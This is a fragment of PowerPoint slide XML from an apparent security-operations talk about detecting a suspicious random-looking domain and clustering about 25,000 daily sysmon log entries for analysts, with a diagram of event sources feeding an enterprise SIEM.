              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this example it has detected the domain 10ak7u9vn1dl01rnuo65k1i3qv.net.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B136F6A-A352-4E4B-9C23-525627F0E8E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87924" y="1486184"/>
            <a:ext cx="3972988" cy="5421085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12421817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25285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18692E09-154C-4B97-9EAF-B59B5963CE37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1216"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2324" y="1486184"/>
            <a:ext cx="12194324" cy="6189345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE4F6A7A-B5E8-4FF1-99DB-CC9433D299AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1702552" y="2750389"/>
            <a:ext cx="8311012" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EXAMPLE 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20714"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ANALYSING LARGE VOLUMES OF DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Our analysts need to review a very large number of log messages from endpoint applications and operating systems on a daily basis focusing on the messages that matter*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>*the system needs the ability to become smarter as we learn more</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10879681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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1498488"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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86" name="TextBox 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EB72A6F-C94C-463A-9193-2B9620204C34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497399" y="1906524"/>
            <a:ext cx="6864481" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DEALING WITH 25,000 LOG ENTRIES PER DAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79B55E8-D122-4F3C-AC1A-741C991FB781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497399" y="2696196"/>
            <a:ext cx="3498131" cy="2866627"/>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GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> monitoring on endpoints to log pertinent events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1100" dirty="0">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sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Typically will receive about 25,000 entries per customer, per day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1100" dirty="0">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sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It’s not possible to go through all the entries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1100" dirty="0">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sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Would like to group similar entries together so we can analyse quickly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1100" dirty="0">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sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Would be good if the system can get smarter over time as we identify both good, interesting and obviously malicious entries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Can 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C05C92E-A081-4BEA-8C92-AF8FEC467842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9154344" y="2417440"/>
            <a:ext cx="516262" cy="610981"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 9884"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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9" name="Can 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D4354B9-87CE-4A9B-B324-B595D4C3F022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9164072" y="3596367"/>
            <a:ext cx="516262" cy="610981"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 9884"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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0" name="Can 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25DA9E47-D6BD-4EAD-81D4-27AE20397A00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7703586" y="3596368"/>
            <a:ext cx="516262" cy="610981"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 9884"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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91" name="Picture 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A8A41CE-BD4A-4B05-BEC6-961FFAB15899}"/>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6579705" y="5139627"/>
            <a:ext cx="877980" cy="839808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92" name="Picture 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED35374D-1940-4712-B3C7-73F8508D6A1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect l="17376" t="26416" r="18042" b="32700"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7456093" y="5265357"/>
            <a:ext cx="894721" cy="610980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93" name="Picture 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84DDECC6-DE64-4FBA-B203-102E0CC4CD62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8"/>
          <a:srcRect l="13830" t="23578" r="12766" b="31385"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8349956" y="5195434"/>
            <a:ext cx="1110211" cy="734778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="94" name="Straight Arrow Connector 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B05948B-E999-41EE-8F4E-E397BB267BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7961717" y="4342067"/>
            <a:ext cx="0" cy="820192"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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95" name="Straight Arrow Connector 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1956DE5A-AEA6-47C2-B8C7-3EF8F0052C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8201672" y="4349630"/>
            <a:ext cx="469467" cy="845804"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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96" name="Straight Arrow Connector 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA8ACB2A-665D-4D99-840D-162621C6C9B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7272743" y="4349629"/>
            <a:ext cx="384175" cy="789998"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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97" name="Straight Arrow Connector 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C14CCC63-BDEA-4E92-9DBF-90D8EEEB553C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8204792" y="2758283"/>
            <a:ext cx="831199" cy="768163"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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98" name="Straight Arrow Connector 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8014460B-3E0D-421D-8116-5F7FBD09D31E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9422203" y="3094570"/>
            <a:ext cx="5717" cy="431876"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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99" name="Straight Arrow Connector 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC22C1A8-E1E6-4F35-82DA-6D5749671876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9753294" y="2738717"/>
            <a:ext cx="445052" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="TextBox 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57368B2A-404B-478B-B0F5-8A8F8D81D9DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8146543" y="2464414"/>
            <a:ext cx="1301085" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enterprise SIEM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="TextBox 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA3A28F-8628-4061-AB91-5A55683F993F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9703431" y="3742886"/>
            <a:ext cx="1301085" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Other Event Sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="TextBox 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56A27E9A-7352-438B-B83B-64AB9E4C7B0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477117" y="3739186"/>
            <a:ext cx="1301085" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Windows Event Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="TextBox 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D5AFDFB-F661-4624-9AAF-539A22A8DF83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9289848" y="4850728"/>
            <a:ext cx="2036368" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
